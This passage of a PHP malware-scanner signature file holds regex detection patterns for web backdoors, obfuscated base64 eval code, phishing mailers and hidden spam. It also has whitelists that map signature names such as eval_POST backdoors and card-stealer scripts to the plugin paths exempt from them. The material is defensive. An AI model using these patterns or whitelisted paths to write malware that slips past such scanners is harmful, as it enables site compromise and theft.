),

'} . $' => array(STR_TRIGGER,
	'(\$\w+)\s*=\s*[\'"][a-z;_]*(?:[46][a-z_;]*)(?:[46][a-z_;]*)[\'"];' => array(REX_WARN, 'rex.b64_obfuscation.002', NULL),
),

'<?php               ' => array(STR_TRIGGER, //empty spaces after php tag!  
	'<\?php     \s{300,}[\$f]' => array(REX_WARN, 'rex.spaced_code.001', NULL),
),

'", "", "' => array(STR_TRIGGER,  
	 '", "", "[\w]{0,2}b[\w]{0,2}a[\w]{0,2}s[\w]{0,2}e[\w]{0,2}6[\w]{0,2}4[\w]{0,2}_[\w]{0,2}d[\w]{0,2}e[\w]{0,2}c[\w]{0,2}o[\w]{0,2}d[\w]{0,2}e[\w]{0,2}"' => array(REX_WARN, 'rex.b64d_obfuscated.003', NULL),
),

'<font color="#' => array(STR_TRIGGER,
	 '([\w]{0,2}<font color="#[\w]{3,6}">[\w]{0,2}[\s]*<.font>[\w]{0,2}){5,}' => array(REX_WARN, 'rex.hidden_colored_spam.001', NULL),
),

'header("Location:' => array(STR_TRIGGER,  
	'header\(.Location.\s*http...com-[^;]+.net.space.php[^;]+\);' => array(REX_WARN, 'rex.location_netspaces.001', NULL),
),

'\'.' => array(STR_TRIGGER,
	'\.\n\s*\'[^\'\n]+?\'\.[a-z0-9]\w+\.\'[^\'\n]+?\'\.[a-z0-9]' => array(REX_WARN, 'rex.obfu_string.001', NULL),
),

'hmod' => array(STR_TRIGGER,
),

'e", "' => array(STR_TRIGGER,
	 'e[\'"][\s]*,[\s]*[\'"].x[\w]+.x[\w]+.x[\w]+.x[\w]+.x[\w]+' => array(REX_WARN, 'php.malware.preg_replace_hexcode.001', NULL),
),

'ail(' => array(STR_TRIGGER,  
	 '(\$message[\s]*\.=[\s]*[\'"][^;]+\$_POST[^;]+;[\s]*){5,}[^\?]+mail\(' => array(REX_WARN, 'rex.phish_mailer_gen.001', NULL),
),  

'edoced_46esab' => array(STR_TRIGGER,
),

'gister_shutdown_function' => array(STR_TRIGGER,
	 '@[\s]*register_shutdown_function[^;]+(_COOKIE|_SERVER|_REQUEST|_POST)' => array(REX_WARN, 'rex.backdoor.eval.003', NULL),
),

'strrev(' => array(STR_TRIGGER,
	 '@header\(strrev[^;]+[Locatinht:]' => array(REX_WARN, 'rex.strrevLocation.001', NULL),
),

'GIF89' => array(STR_TRIGGER,  
	'\AGIF[^\n]+\s*<.[Hh][Tt][Mm][Ll]' => array(REX_WARN, 'rex.fake_gif.002', NULL),
),

'Array' => array(STR_TRIGGER,  
	 'function\s*_[0-9]{3,}\(\$i\)[^;]+Array' => array(REX_WARN, 'rex.function_array.001', NULL),
),

'#!/bin/' => array(STR_TRIGGER,
),

'/e' => array(STR_TRIGGER,
	'\/e["\']\s*,\$' => array(REX_WARN, 'rex.malware.generic.030.02', NULL),
),

// last signature DB file, contains array ending

); /* Close the sigs here. */

$MD5_WHITELIST = array(


'all_folders'    => array(),
'Thumbs.db'    => array(),

'/ewww-image-optimizer/'       => array('293e26924a274c6185a06226619d8e02', // optipng.exe
                                        'dabf8173725e15d866f192f77d9e3883', // jpegtran.exe
                                        'aad47bafdb2bc8a9f0755f57f94d6eaf', // gifsicle.exe
),

);

/**
* Whitelist for random filenames.
*
* Works with full path or filename only.
* Please remember to keep the trailing /.
* 
*/
$NAME_WHITELIST = array(
'/wp-content/themes/SportsGeek2/070312.header.php',
'phpBB3/phpbb/passwords/driver/md5_vb.php',
'phpBB3/phpbb/passwords/driver/md5_mybb.php',
'phpBB3/phpbb/db/migration/data/v31x/v318rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v317rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v316rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v315rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v314rc2.php',
'phpBB3/phpbb/db/migration/data/v31x/v314rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v313rc2.php',
'phpBB3/phpbb/db/migration/data/v31x/v313rc1.php',
'phpBB3/phpbb/db/migration/data/v31x/v312rc1.php',
'/p8pbbcb/p8pbbcb.php',
'p8pbbcb/p8pbbcb.script.php',
'/p8pbbjp/p8pbbjp.php',
'p8pbbjp/p8pbbjp.script.php',
'libraries/CBLib/CBPHPMailer/CBSMTP.php',
'mobiquo/mbqFrame/fdt/MbqFdtPm.php',
'mobiquo/mbqFrame/fdt/MbqFdtPc.php',
'mobiquo/mbqFrame/entity/MbqEtPcMsg.php',
'mobiquo/mbqFrame/baseLib/baseWrite/MbqBaseWrEtPcMsg.php',
'mobiquo/mbqFrame/baseLib/baseRead/MbqBaseRdEtPcMsg.php',
'mobiquo/mbqClass/lib/write/MbqWrEtPm.php',
'mobiquo/mbqClass/lib/write/MbqWrEtPcMsg.php',
'mobiquo/mbqClass/lib/write/MbqWrEtPc.php',
'mobiquo/mbqClass/lib/read/MbqRdEtSocial.php',
'mobiquo/mbqClass/lib/read/MbqRdEtPm.php',
'mobiquo/mbqClass/lib/read/MbqRdEtPcMsg.php',
'cb/includes/classes/swfObj.class.php',
'gallery/helpers/MY_num.php',
'phpBB3/mobiquo/mbqClass/lib/read/MbqRdEtPc.php',
'wp-content/plugins/wcplicense/scopbin/75067478.php',
'wp-content/plugins/dapshoppingcart/scopbin/58441923.php',
'eBay/webmaster/911006.php',
'dap/scopbin/911006.php',
'/pdf417.php',
'/cache',
'/smarty/',
'/htmlMimeMail/RFC822.php',
'/wp-content/plugins/social-link-machine/v2/platforms/pdf/box/SLMBoxAPI.php',
'/gfont/T3GFont.php',
'/lib/Magestore/Inventorybarcode/Class/',
'/lib/Magestore/Inventorybarcode/Html/',
'/barcode/config/',
'/barcode/class/',
'/app/code/community/VES/AdvancedPdfProcessor/Pdf/lib/fonts/',
'/app/code/community/VES/PdfProProcessor/Pdf/lib/fonts/',
'/Avgsum.php',
'/PHPFox3.php',
'/rfc822.php',
'/RFC822.php',
'srpski.php',
'MySkin.deps.php',
'MySkin.php',
'xbriyazBI.mtx.php',
'/wp-content/plugins/wordfence/waf/wfWAFGeoIP.php',
'/core/lib/itsec-zxcvbn-php/zxcvbn.php',
'/wordfence/waf/wfWAFGeoIP.php',
'CFNetwork.php',
'/wordfence/waf/wfWAFGeoIP2.php',
'/wordfence/models/common/wfGeoIP2.php',
'HSalsa20.php',
'XSalsa20.php',
'SmtpMsa.php',
'/zxcvbn-php/src/Zxcvbn.php',
'/contact-form-7-multi-step-module/cf7msm.php',
'/lib/SetaPDF/Core/Font/MMType1.php',
'/vendor/google/apiclient-services/src/Google/Service/Gmail/SmtpMsa.php',
'/vendor/thadafinser/user-agent-parser/src/Provider/Zsxsoft.php',
'/plugins/backup/com/lib/SGArchive.php',
'/src/Adapter/PDFLib.php',
'/tgm/gt3-tgm.php',
'/Rfc7230.php',
'/rfc7230.php',
'/RFC7230.php',
'Pbkdf2.php',
'HTMLSax3.php',
'I18nSniff.php',
);

$SPAMWARS_WHITELIST = array(
'wp-content/cache',
'wp-content/uploads/db-cache',
);

$WHITELIST_SIG = array(
'asp.malware.obfuscated.001.02' => array('/performance/vendor/bower-asset/bootstrap/docs/assets/js/customize.min.js', '/performance/vendor/bower-asset/bootstrap/docs/assets/js/raw-files.min.js', '/wp-content/plugins/mwuse/mtw-script/bootstrap', '/wp-content/plugins/tsp-easy-dev/vendor/twbs/bootstrap/docs/assets/js/', ), 
'asp.malware.obfuscated.001.04' => array('/build/babel-polyfill.js', '/coblocks/dist/', ), 
'filename.hardening_temp_dir.001' => array('index.php', 'blocks.php', 'wp-ulike/admin/classes/tmp', '/tmp/aCompile', '/tmp/mCompile', ), 
'filename.hardening_upload_dir.001' => array('wp-content/uploads/wpsc/themes', 'wp-content/uploads/sucuri', 'wp-content/uploads/sites', 'wp-content/uploads/espresso/templates', 'wp-content/uploads/dynamik-gen', 'wp-content/uploads/pb_backupbuddy', 'wp-content/uploads/genesis-extender/plugin', 'wp-content/uploads/backupcreator', 'wp-content/uploads/backupbuddy_temp', '/tcpdf_fonts', 'wp-content/uploads/PDF_EXTENDED_TEMPLATES', 'wp-content/uploads/wp-clone/wpclone_backup', 'wp-content/uploads/smile_fonts/Defaults', 'wp-content/uploads/warp', 'wp-content/uploads/wp-slimstat', 'wp-content/uploads/spacker-cache', 'wp-content/uploads/tsp_plugins/tsp-easy-dev/cache', 'wp-content/uploads/tsp_plugins/tsp-featured-posts/cache', 'wp-content/uploads/wpallimport', 'wp-content/uploads/wp-security-audit-log/404s/index.php', 'wp-content/uploads/wp-security-audit-log/index.php', 'wp-content/uploads/mc4wp-debug-log.php', 'wp-content/uploads/profiles/index.php', '/wp-content/uploads/wpo_wcpdf/fonts/', '/wp-content/uploads/woocommerce-pdf-invoices/mpdf/ttfontdata/', ), 
'htaccess.hacktool.safemode-disabler.001' => array('/plugins/connections/includes/class.filesystem.php', ), 
'htaccess.hacktool.symlink-viewer.001' => array('images/.htaccess', 'dada_mail_support_files/file_uploads/.htaccess', 'dada_mail_support_files/kcfinder/core/uploader.php', 'cgi-bin/dada-7_0_0/extras/packages/kcfinder/core/uploader.php', 'cgi-bin/dada/extras/packages/kcfinder/core/uploader.php', '/extras/documentation/html_version/changes_6_x.pod.html', 'dada_mail_support_files/kcfinder-backup-2014-07-13-1405284135/core/uploader.php', '/kcfinder/core/uploader.php', ), 
'htaccess.malware.generic.005' => array('/s2member/includes/classes/files-in.inc.php', ), 
'htaccess.spam-seo.prepend.001' => array('ose-firewall/protected/library/sysguard/sysguard.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/bootstrap-sample.php', 'wp-content/plugins/wordfence/lib/wordfenceClass.php', 'wp-content/plugins/wordfence/waf/bootstrap.php', ), 
'htaccess.spam-seo.redirect_gen.033' => array('/wp-content/plugins/seo-redirection/seo-redirection.php', ), 
'html.iframe.gen.003' => array('/docs/awstats_contrib.html', ), 
'html.iframe.generic.018' => array('wp-content/plugins/facebook-social-widgets/components/likebox.php', 'mod/resource/type/ims/resource.class.php', 'mod/resource/type/file/resource.class.php', '/includes/wp_booster/td_video_support.php', '/forms/manage_report.php', '/forms/widget_code.php', '/forms/embed_code.php', '/forms/js/manage_report.php', '/forms/js/widget_code.php/', '/com_judownload/assets/wysibb/preset/phpbb3.js', ), 
'html.malware.location_refresh.001' => array('vsadmin/inc/inccart.php', ), 
'html.phishing.dhl.003.02' => array('/admin/modules/view_order.php', '/admintemplates/dhlform.htm', ), 
'html.phishing.generic.029' => array('/support/supporters.html', ), 
'html.phishing.generic.094' => array('/wp-content/themes/pcg-responsive/header.php', ), 
'html.phishing.paypal.001.002' => array('/secure/paypalForm.php', '/tools/smarty/compile/', 'doc/payments/CreatePaymentUsingPayPal.html', 'doc/payments/OrderCreateUsingPayPal.html', 'doc/payments/AuthorizePaymentUsingPayPal.html', 'doc/billing/CreateBillingAgreementWithPayPal.html', '/sdgoogleauthorship/sdgoogleauthorshippaypal.html', '/wp-content/themes/ctba/list-horse.php', '/source/createpaymentusingpaypal.html', '/magento_localized_ebay/paypal_popup.phtml', ), 
'html.phishing.paypal.005' => array('modules/ebay/ebay.php', 'wp-content/plugins/wassup/wassup.php', ), 
'html.phishing.yahoo.009' => array('/pressforward/libraries/mozillareadability/test/', ), 
'html.redirect.http-Refresh-base64.001' => array('/symfony/debug/tests/exceptionhandlertest.php', ), 
'html.redirect.http-Refresh_gen.001' => array('/intranet/includes/batch.inc', 'themes/optimize/template-redirect.php', 'core/fn.common.php', 'views/exim/export.tpl', 'themes/alyeska/template_redirect.php', 'components/com_jomcomment/patch/backup/mtree.php', 'MailingList/admin/messages.php', 'includes/functions.inc.php', 'themes/newscore/includes/functions/theme-parts-general.php', 'profile-builder/front-end/wppb.register.php', 'profile-builder/front-end/wppb.login.php', 'themes/canvas/template-redirect.php', 'themes/thestation/template-redirect.php', 'payment/twocheckout.php', 'themes/gazette/template-redirect.php', 'includes/remote/remote.inc.php', '/wp-content/themes/publisher/template-redirect.php', '/vsadmin/inc/inc', 'wp-content/plugins/profile-builder', 'wp-content/plugins/eventsplus/', 'components/com_mtree/mtree.php', 'components/com_mtree/upgrade.php', ), 
'html.spam-seo.buy_cheap.001' => array('/plugins/gm-block-bots/gm-block-bots.php', ), 
'html.spam-seo.hidden-div.007' => array('/ckeditor/ckeditor.js', 'ckeditor-basic/ckeditor.js', '/filter/default.js', 'ckeditor/_source/core/tools.js', ), 
'html.spam-seo.redirect.020' => array('/wp-content/themes/eduma/documentation/documentation.html', ), 
'html.spam-seo.spam-links.012' => array('/wp-content/themes/casino/templates/', '/wp-content/plugins/directorist/templates/front-end/all-listings/maps/openstreet/js/unpkg-min.js', ), 
'image.generic_code.001' => array('/plugins/woocommerce-inventory-manager/images/spacer.gif', ), 
'image.html_code.001' => array('/swm-notselected.png', '/swm-selected.png', ), 
'image.javascript.003' => array('/swm-notselected.png', '/swm-selected.png', ), 
'image.php_code.001' => array('/plugins/woocommerce-inventory-manager/images/spacer.gif', ), 
'js.blackhole.generic.001' => array('theme_config/extensions/shortcodes/shortcodes/', '/modules/mod_sbd_rollmenu/mod_sbd_rollmenu.php', '/wp-content/plugins/smart-before-after-viewer/includes/TwentyTwenty.php', '/templates/paaapadm/index.php', '/wp-content/plugins/captainform/public/partials/form-resources/', ), 
'js.blackhole.generic.001.01' => array('theme_config/extensions/shortcodes/shortcodes/', '/modules/mod_sbd_rollmenu/mod_sbd_rollmenu.php', '/wp-content/plugins/smart-before-after-viewer/includes/TwentyTwenty.php', '/templates/paaapadm/index.php', 'plugins/calculated-fields-form/cp_calculatedfieldsf_public_int.inc.php', '/wp-content/plugins/advanced-ads/classes/frontend_checks.php', '/wp-content/plugins/captainform/public/partials/form-resources/', ), 
'js.malware.Donnazmi-encryptor.001' => array('/smallbiz/admin.min.js', ), 
'js.malware.cryptominer.026' => array('/frontend/Codazon/unlimited_baby_kids/en_US/js/bundle/bundle1.js', ), 
'js.malware.css-behavior.001' => array('/wp-content/themes/vegasstdtesting/css/style.css', '/fastener_usa/css/styles.css', 'wp-content/themes/oncall/static/css/main.min.css', '/css/styles.template.css', 'css/jq_template.css', ), 
'js.malware.generic.004' => array('/addons/wg_search/js.js', '/misc/statics/js/tygh/', '/server/classes/back/cls_datagrid.php', ), 
'js.malware.generic.006' => array('photocrati_nextgen/modules/attach_to_post/static/ngg_attach_to_post_tinymce_plugin_wp38_compat.min.js', 'js/atemay', '/vertex/admin/js/jquery.vertexAdmin.core.min.js', 'assets/js/add_to_calendar.js', 'vertex/admin/js/jquery.vertexadmin.core.min.js', '/wp-content/plugins/wp-slimstat/wp-slimstat.js', ), 
'js.malware.generic.024' => array('/temgra/colorCustomOptions.js', ), 
'js.malware.generic.036' => array('/wpscripts/jssecurity.js', '/wp-content/plugins/nex-forms/nf-admin/js/dashboard.js', '/wp-content/plugins/advanced-iframe/js/ai_external.js', '/admin/vendor/bower', '/bootstrap-datepicker/docs/_screenshots/script/common.js', ), 
'js.malware.hidden-iframe.003' => array('/kfm/j/all.php', '/editor/libraries/plupload/plupload.html5.js', '/wp-content/plugins/slimjetpack/_inc/devicepx-jetpack.js', 'js/typeface-0.15.js', 'wp-content/uploads/wp-hummingbird-cache', 'dhtmlSuite-common.js', 'html5-assets/js/canvg.min.js', 'Calendar_files/dhtmlSuite-calendar.js', 'lib/script/ajaxupload.js', '/files/js/lib/min/global.js', '/wp-content/plugins/wp-premium-image-manager/app/js/vendor/ajax-upload/fileuploader.js', '/DirectoryTest/PhpLD/javascripts/ajaxupload_min.js', '/plugins/accesspress-anonymous-post-pro/js/fileuploader.js', '/wp-content/plugins/slimpack/slimpack/_inc/devicepx-jetpack.js', ), 
'js.malware.injector.006' => array('/payment/epos-device-', ), 
'js.malware.injector.025' => array('/wp-content/plugins/ultimate-cms/index.php', 'components/com_rsgallery2/options/images.html.php', '/wp-content-old-bak/plugins/ultimate-cms/index.php', ), 
'js.malware.injector.026' => array('components/com_rsgallery2/options/images.html.php', '/plugins/ultimate-cms/index.php', ), 
'js.malware.injector.031' => array('plupload-2.1.1/moxie.min.js', '/wp-content/uploads/spacker-cache/', '/js/redactor/redactor.min.js', ), 
'js.malware.magento-cc-stealer.002.02' => array('/cdn/min.js', ), 
'js.malware.magento-cc-stealer.004' => array('/assets/js/main.js', '/media/js/', '/assets/js/main.min.js', ), 
'js.malware.magento-cc-stealer.013' => array('/tmpl/ourteamtestimonials/js/ourteam.js', ), 
'js.malware.magento-cc-stealer.048' => array('/frontend/Codazon/unlimited_drug_pharmacy/en_US/Magento_Swagger/swagger-ui/js/swagger-ui-bundle.js', ), 
'js.malware.magento-cc-stealer.109' => array('/assets/js/design.js', ), 
'js.malware.neutrino.001.05' => array('/wp-content/plugins/site-analytics/siteanalytics.php', '/jquery.nyroModal.custom.js', '/wp-content/themes/enfold-child/footer.php', '/reports/bitsoflace/Archive/report-2008-06-27/site-search-', 'wp-content/themes/cherryville/js/nyromodal.js', '/components/com_rsseo/views/competitors/tmpl/default.php', '/wp-content/plugins/snoobi-bv-analytics-tracking/snoobi_bv_analytics_tracking.php', ), 
'js.malware.nuclearexploitkit.008' => array('wp-content/plugins/popupally/popup-ally.php', 'wp-content/plugins/popupally/resource/frontend/disable.php', ), 
'js.malware.observer.001' => array('/catalog/view/javascript/supermenu.js', ), 
'js.malware.popads.002' => array('/wp-content/themes/realtyspace/public/js/vendor.js', '/en_us/js/bundle/bundle', ), 
'js.malware.redirect.002.002' => array('/temgra/colorCustomOptions.js', ), 
'js.phishing.paypal.001.02' => array('wp-content/plugins/paypal-wp-button-manager/admin/js/paypal-wp-button-manager-widgets.js', ), 
'js.redirect.window_location.001' => array('/wp-content/plugins/wpclicks/tracker/functions.js', ), 
'js.redirect.window_location.007' => array('/instagram/js/com.js', ), 
'js.spam-seo.SoakSoak.001' => array('wp-content/uploads/sucuri/sucuri-sitecheck.php', ), 
'js.spam-seo.hidden-style.005' => array('gallery2/lib/support/templates/SupportStatus.html', 'gallery/lib/support/templates/SupportStatus.html', 'gallery/upgrade/templates/MainPage.html', 'gallery/install/templates/MainPage.html', '/modules/mod_pwebcontact/form/fields/pwebfields.php', ), 
'js.spam-seo.jQuery_injector.001' => array('/media/js/', '/media/po_compressor/1/js/', ), 
'js.spam-seo.redirect.044' => array('/popup-domination/inc/aweber.php', '/pulsepro/pulsepro/diag.php', ), 
'php.backdoor.WSO.008' => array('/jamss.php', ), 
'php.backdoor.array_filter.001' => array('/wp-content/plugins/gotmls/images/index.php', ), 
'php.backdoor.assert.005' => array('/wp-content/plugins/woocommerce-quickbooks-pos/QuickBooks/IPP/Federator.php', ), 
'php.backdoor.assert.021' => array('/codelock.php', ), 
'php.backdoor.base64.001.03' => array('importbuddy.php', '_repairbuddy.php', '/tv/video_encoder.php', ), 
'php.backdoor.base64.001.04' => array('/app/code/community/Scommerce/', '/includes/src/Celebros_Celexport', '/includes/src/scommerce', ), 
'php.backdoor.base64.001.05' => array('/admin/functions/process.php', '/app/code/local/GoMage/Navigation/Helper/', 'includes/src/GoMage_Navigation_Helper_Data.php', '/mvc/models/', '/config/config.php', '/video_uploader.php', '/video_encoder.php', '/tv/embed.php', '/mvc/controllers/', '/mvc/views/', '/core/Kanrit', '/mvc/helpers/', ), 
'php.backdoor.base64.002.02' => array('/wp-content/plugins/simple-podcast-press/', 'sendy/_install.php', 'sendy/includes/functions.php', 'mailer/_install.php', 'mailer/includes/functions.php', '/adiinviter/adiinviter_bootstrap.php', '/com_admintools/akeeba/platform/jfscan/engines/archiver/jfscan.php', ), 
'php.backdoor.base64.004' => array('/wp-content/plugins/wp-live-chat-support-pro/includes/cryptoHelpers.php', '/wp-content/plugins/wp-live-chat-support/includes/cryptoHelpers.php', ), 
'php.backdoor.beandoor.001' => array('/wp-content/plugins/simple-podcast-press/', 'wp-content/themes/jabbok/functions.php', 'wp-content/plugins/simple-video-press/widget/easyyoutubesubscribe-widget.php', 'wp-content/plugins/xyz-wp-', '/wp-content/plugins/wpaffsurgems-2.10/', '/Evince/CustomForms/Block/Adminhtml/Customforms.php', '/app/code/community/VladimirPopov/WebForms/Block/Webforms.php', '/includes/src/VladimirPopov_WebForms_Block_Webforms.php', 'wp-content/themes/profitstheme_11/lib/init.php', '/lib/init.php', '/xyz-wp-contact-form/admin/', ), 
'php.backdoor.c99-shell.001.05' => array('/ose_virus_definitions.php', ), 
'php.backdoor.cookie.004' => array('/wp-content/plugins/memberium2/lib/frontend.php', ), 
'php.backdoor.cookie.005' => array('/wp-content/plugins/memberium2/lib/frontend.php', ), 
'php.backdoor.create_function.015' => array('/libraries/afterlogic/common/utils.php', ), 
'php.backdoor.eval_POST.008.002' => array('/app/code/community/Php4u/Notification/', '/app/code/community/Php4u/CatalogSearch/', '/app/code/community/Php4u/BlastLuceneSearch/', '/app/code/community/Php4u/Adminhtml/', '/includes/src/Php4u_BlastLuceneSearch', '/sysplugins/smarty_internal_function_call_handler.php', '/modules/contrib/ctools/plugins/access/php.inc', '/modules/Configurator/views/view.addfontresult.php', '/lib/album-gallery-bank-class.php', 'gallery-bank-eco-edition-2.1.6/lib/settings-class.php', 'application/controllers/', 'application/controllers/widgets/show.php', 'application/core/MY_Controller.php', 'application/helpers/app_', 'application/helpers/inflector_helper.php', 'application/libraries/', 'application/models/', '/app/code/community/VladimirPopov/WebForms/Block/', '/includes-src/VladimirPopov_WebForms_Block_', 'administrator/components/com_gmapfp/models/fields/modal/cp.php', 'administrator/components/com_gmapfp/script.php', 'admin/functions/check.inc.php', 'admin/functions/class.inc.php', 'admin/functions/donate.inc.php', 'admin/functions/mail.inc.php', 'admin/popups/paypal-donate.inc.php', 'includes/config.inc.php', 'admin/pages/lizenz.inc.php', '/wp-content/plugins/easy-media-gallery-pro/', 'com_jhackguard/data/scans/rules.php', 'includes/src/Php4u_', 'Php4u/Adminhtml/controllers/', 'Php4u/BlastLuceneSearch/', 'Php4u_Adminhtml_Block_System_Cache_Edit.php', 'Php4u_BlastLuceneSearch_', 'Php4u_CatalogSearch_Model_', 'Php4u_Notification_Model_', 'modules/ctools/plugins/access/php.inc', '/extendware/system/serials/combined.php', '/extendware/system/licenses/combined.php', '/wp-content/plugins/easy-image-slider-pro/inc/', '/app/code/community/Magebird/Popup/', '/wp-content/plugins/gallery-bank-pro-edition-2.1.6/lib/settings-class.php', 'support/__swift/thirdparty/Jaxl/jaxl.php', '/wp-content/plugins/wp-secure-amazon-s3/wp-secure-amazon-s3.php', '/lib/magebird/popup/popup_helper.php', '/lib/magebird/popup/product_model.php', '/lib/magebird/popup/popup_model.php', '/app/code/community/Php4u/BlastSearchAutocompleter/', '/includes/src/Php4u/BlastSearchAutocompleter/controllers/SuggestController.php', '/shell/lucene-tool.php', '/photocrati_nextgen/modules/attach_to_post/package.module.attach_to_post.php', '/components/com_mijoshop/opencart/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php', '/plugins/system/cp/cp.php', '/js/includes/src/Magebird', 'wp-content/plugins/easy-image-slider-pro/easy-image-slider-pro.php', '/inc/util/real-estate-functions.php', '/modules/main/admin/php_command_line.php', '/includes/src/magebird', '/psy/psysh/src/', '/common/lib/yii/', '/ctools/plugins/access/php.inc', '/sites/all/modules/elysia_cron/elysia_cron.module', '/wp-content/plugins/easy-contact-form-pro/easy-contact-form-pro.php', '/wp-content/plugins/wp-client-feedback-wizard/wp-client-feedback-wizard.php', ), 
'php.backdoor.eval_POST.010' => array('/wp-content/plugins/fv-antispam/fv-antispam.php', '/wp-content/plugins/navayan-subscribe/functions.php', '/wp-content/themes/megalithe/slider/slide-post-type.php', '/wp-content/plugins/lollum-framework/includes/functions-metaboxes.php', '/wp-content/plugins/lollum-framework/includes/builder/data-builder.php', '/wp-content/plugins/magicmembers/core/hooks/mgm_user_hooks.php', '/wp-content/plugins/widget-wrangler/ww-widget-class.php', '/wp-content/plugins/wpnewsman-newsletters/core.php', '/wp-content/themes/metro/functions/common-meta.php', '/wp-content/plugins/authorityprosqueezer/library/core/insert-posts.php', '/wp-content/plugins/antispam-bee/antispam_bee.php', '/wp-content/plugins/wp-custom-fields-search/wp-custom-fields-search.php', '/scb/AdminPage.php', '/scb/_AdminPage.php', '/doitmax_fw/uielement.class.php', 'hupso-share-buttons-for-twitter-facebook-google/share-buttons-hupso.php', 'admin/de/class.devedit.php', '/wp-content/themes/visionaire104/scripts/functions/post_options.php', '/wp-content/themes/visionaire104/scripts/functions/portfolio-cats.php', '/wp-content/plugins/admin-customization/admin/admin.php', 'wp-content/plugins/easy-pagination/includes/class.EAPBackend.php', '/classes/portfolio-posttype.php', 'wp-content/plugins/click-heat-dynamo/wp_adv_click_map_main.class.php', 'wp-content/plugins/split-test-dynamo/tpl/dynamoupdates.class.php', 'wp-content/plugins/split-test-dynamo/wp_split_test_main.class.php', 'plugins/navayan-subscribe/ny-subscribe.php', 'wp-content/plugins/content-buddy/wp_content_buddy_main.class.php.orig', '/includes/panels.prototypes.php', '/lollum-framework/includes/builder/data-builder.php', '/lollum-framework/includes/functions-metaboxes.php', '/_adminpage.php', '/wp-content/plugins/wpseo/wpseo.php', '/navayan-subscribe/functions.php', ), 
'php.backdoor.eval_POST.010.001' => array('com_vemod_news_mailer/vemod_news_mailer.php', 'components/com_vemod_news_mailer/admin.vemod_news_mailer.php', 'phpBB3/cb/cb_install/modes/dataimport.php', 'cb/cb_install/modes/dataimport.php', '/vsadmin/doupload.php', '/vsadmin/inc/incorders.php', 'wp-content/plugins/richtexteditor/richtexteditor/server_php/phpuploader/include_phpuploader.php', '/wp-content/plugins/watupro/controllers/exams.php', ), 
'php.backdoor.eval_POST.010.002' => array('/wp-content/plugins/custom-background/includes/class.Backgrounds.p', '/wp-content/plugins/automatic-domain-changer/auto-domain-change.php', '/wp-content/plugins/calculated-fields-form/cp_calculatedfieldsf_platinum.php', ), 
'php.backdoor.eval_POST.028' => array('/logs/jhackguard-log.php', ), 
'php.backdoor.eval_REQUEST.002.02' => array('/modules/Configurator/views/view.addfontresult.php', '/lib/album-gallery-bank-class.php', 'gallery-bank-eco-edition-2.1.6/lib/settings-class.php', '/wp-content/plugins/gallery-bank-pro-edition-2.1.6/lib/settings-class.php', '/photocrati_nextgen/modules/attach_to_post/package.module.attach_to_post.php', '/modules/main/admin/php_command_line.php', ), 
'php.backdoor.eval_REQUEST.004' => array('/wp-content/plugins/seo-rets/methods/customsearch.php', '/wp-content/plugins/seo-rets/methods/ajax.php', 'includes/remote/remote.inc.php', 'admin/sources/products/import.inc.php', 'modules/3rdparty/Related_Products_Auto_Search/admin/products.php', '/wp-content/plugins/wp-secure-amazon-s3/wp-secure-amazon-s3.php', '/atrex/', '/mvc/models/', '/config/config.php', '/video_uploader.php', '/video_encoder.php', '/tv/embed.php', '/mvc/controllers/', '/mvc/views/', '/core/Kanrit', '/mvc/helpers/', ), 
'php.backdoor.eval_REQUEST.026' => array('/app/code/local/GoMage/Checkout/Helper/Data.php', ), 
'php.backdoor.eval_gen.001' => array('/mime.magic.php', '/wp-content/plugins/botdetect-wp-captcha/lib/botdetect/', '/wp-content/plugins/leaflet-maps-marker-pro/leaflet-core.php', '/wp-content/plugins/leaflet-maps-marker-pro/leaflet-license.php', '/ckfinder/ckfinder.js', 'app/code/local/Wyomind/Datafeedmanager/Model/Configurations.php', 'app/code/local/Wyomind/Pointofsale/controllers/Adminhtml/ManageController.php', 'Wyomind/Simplegoogleshopping/Model/Simplegoogleshopping.php', 'Wyomind/Ordersexporttool/Model/Profiles.php', '/app/code/local/Wyomind_/Datafeedmanager/Model/Configurations.php', '/includes/src/Wyomind_Simplegoogleshopping_Model_Simplegoogleshopping.php', 'includes/src/Wyomind_Datafeedmanager_Model_Configurations.php', '/system/library/mfilter_core.php', '/app/code/community/AwoDev/AwoRewards/Model/License.php', '/Wyomind/Licensemanager/Helper/Simplegoogleshopping.php', '/Simplegoogleshopping/Model/Simplegoogleshopping.php', '/app/code/local/Wyomind/Datafeedmanager/Helper/Datafeedmanager.php', '/wp-content/plugins/wp-translator-revolution/classes/auth.class.php', '/ckfinder.js', '/app/code/local/wyomind/simplegoogleshopping/', '/wp-content/plugins/prisna-wp-translate/classes/classes.php', '/plugins/system/joomlaidplogin/joomlaidplogin.php', '/plugins/system/joomlaidplogin/saml2idp/logoutrequest.php', '/app/code/wyomind/massproductimport/model/resourcemodel/type/system.php', '/wp-content/plugins/wp-translator-revolution/classes/main.class.php', '/wp-content/plugins/miniorange-', '/wp-content/plugins/maps-marker-pro/classes/menu-license.php', '/wp-content/plugins/wp-translator-revolution-dropdown/classes/main.class.php', '/wp-content/plugins/ldap-login-for-intranet-sites/', '/wp-content/plugins.ol/leaflet-maps-marker-pro/leaflet-license.php', '/wp-content/plugins/maps-marker-pro/classes/spbas.php', '/vendor/cart2quote/module-license/http/client.php', '/system/library/mfilter_', '/app/code/cart2quote/license/http/client.php', '/wp-content/plugins/wp-translator-revolution/classes/common.class.php', '/admin/model/extension/module/extrapanel.php', '/includes/src/wyomind/pointofsale/controllers/adminhtml/managecontroller.php', ), 
'php.backdoor.eval_gen.001.03' => array('forms/reservation/admin/lib/admin_functions.php', ), 
